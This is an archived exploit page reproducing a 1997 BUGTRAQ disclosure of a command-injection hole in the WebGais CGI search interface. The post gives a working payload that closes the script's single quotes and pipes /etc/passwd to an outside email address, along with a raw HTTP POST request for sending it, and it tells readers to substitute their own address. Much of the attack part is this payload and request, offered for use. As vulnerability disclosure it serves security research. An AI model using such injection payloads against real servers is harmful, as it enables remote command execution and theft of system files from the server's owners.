WebGais forgot to strip single quotes in query string ... Oops!

Summary
Description:Webgais takes a query string, and quotes it in the perl code. But you can just close the quotes yourself, as it doesn't strip them from your query!
Author:Razvan Dragomirescu <drazvan@KAPPA.RO>
Compromise:run arbitrary commands remotely as the owner of the cgi running process.
Vulnerable Systems:Anything running a vulnerable version of WebGais
Date:10 July 1997
Notes:Remember to change the email address in the exploit!
Details


Date: Thu, 10 Jul 1997 19:03:14 +0300
From: Razvan Dragomirescu <drazvan@KAPPA.RO>
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerability in WEBgais

Hi,

This one is really short. I'm leaving town tomorrow, so I had no time to
"refine" this. It will require a little bit of work from you this time.

So here it is:

WebGais is an interface to the GAIS search tool. It installs a few
programs in /cgi-bin. The main utility is called "webgais" and does the
actual interfacing with the search tool.

It reads the query from a user form, and then runs the GAIS search engine
for that query. The author tried to protect the program by
using single quotes around the query when he passed it to a "system"
command. But he forgot one VERY important thing: to strip single quotes
from the query (this was done in Glimpse).
So, if we send a query like:
query=';mail+foo@somewhere.net</etc/passwd;echo'&.....
we will trick the "protection" system.

The only problem here is that you have to provide a certain combination of
input parameters, to reach the vulnerable line in the script. It took me
about half an hour to get those parameters right.

I also had to comment some code from the script to bypass some error
messages, because I do not have the GAIS search tool installed, I only
have the WEBGais interface. Of course, you won't have to modify the script
at all. It should work just fine as it is.
So here's how I exploited this:

telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

... and it worked. But to make it work for your system too, you'll have to
add other parameters, like idx_dir and data_type who are required by the
script in its original version. Just make a normal query to your WebGais
server and see what all the parameters are. But remember to use "output" and
"domain" as specified in my exploit. Otherwise you will end up in some
other place of the script and nothing will happen.

Again, I'm sorry this is not as documented as you would have expected.
I will not be able to provide support for this. I will not have Internet
access for about a month. But I'm sure someone will complete this as soon
as possible (maybe the guys at SecNet who seemed really interested...).

See you all in August.
Be good.
Razvan

--
Razvan Dragomirescu
drazvan@kappa.ro, drazvan@romania.ro, drazvan@roedu.net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]